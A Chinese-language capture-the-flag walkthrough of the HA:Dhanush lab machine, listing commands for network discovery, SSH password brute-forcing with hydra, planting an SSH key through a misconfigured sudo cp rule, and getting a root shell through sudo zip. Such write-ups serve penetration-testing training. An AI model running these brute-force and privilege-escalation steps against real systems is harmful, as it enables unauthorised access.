HA:Dhanush靶机渗透过程
准备环境
攻击机:Kali-Linux-2021.2
目标靶机:HA:Dhanush
平台:VMware Workstation 16
均为NAT
模式
一、信息收集
1.主机嗅探
此时,攻击机(Kali
)和目标靶机(HA:Dhanush
)位于同一网段中,先查看Kali
的IP
ifconfig
可得知,Kali
的IP
为192.168.72.128/24
,接下来进行嗅探目标靶机的IP
地址
netdiscover -r 192.168.72.0/24
由此可见,目标靶机的IP
地址为192.168.72.129
2.端口扫描
开始对其进行端口扫描
nmap -A -p- 192.168.72.129
发现目标靶机开放了两个端口,80
(http
)和65345
(open_ssh
)
3.访问其web服务
先访问靶机的web
服务
这只是一个介绍dhanush
的页面,并不能很明显的看出来有用的信息
二、漏洞挖掘
1.cewl提取网站关键字
根据靶机的描述中的“枚举”,我们需要从web服务中的信息生成ssh所需要的用户名和密码来进行爆破
cewl http://192.168.72.129/ -w passwd.txt
2.john生成字典
john --wordlist=passwd.txt --stdout --rules > ./username.txt
3.hydra进行遍历爆破
hydra -L ./username.txt -P ./passwd.txt 192.168.72.129 ssh -s 65345 -e nsr -t 30
爆破过程略长,大概10分钟左右
成功拿到ssh的用户名(pinak
)和密码(Gandiv
)
三、漏洞利用
1.SSH连接到pinak
ssh pinak@192.168.72.129 -p 65345
Gandiv
2.尝试sudo能否提权
id && sudo -l
发现可以通过用户sarang
的权限来使用cp
命令,查看用户sarang
家目录下有哪些东西
cd /home/sarang $$ ls -lha
发现在用户sarang
的家目录下有.ssh
目录,但当去尝试访问.ssh
目录的时候没有权限
结合刚才sudo -l
可知,以sarang
权限执行cp
,在当前用户(pinak
)创建连接到sarang
的ssh
,生成一个连接公钥
cd ~
ssh-keygen
并且将公钥复制到sarang
chmod 777 ./.ssh/id_rsa.pub
cp ./.ssh/id_rsa.pub /home/pinak
sudo -u sarang /bin/cp ./id_rsa.pub /home/sarang/.ssh/authorized_keys
3.SSH连接到sarang
ssh sarang@127.0.0.1 -i ./.ssh/id_rsa -p 65345
继续sudo -l
尝试提权
id && sudo -l
4.完成提权
发现可以以root
权限来执行zip
命令,可以通过对此的利用来获取root
权限
touch 123
sudo zip ./123.zip ./123 -T --unzip-command="sh -c /bin/bash"
已经拿到root
权限了,接下来寻找flag
find / -name "flag.*"
找到flag.txt
位于/root
下,直接查看
cat /root/flag.txt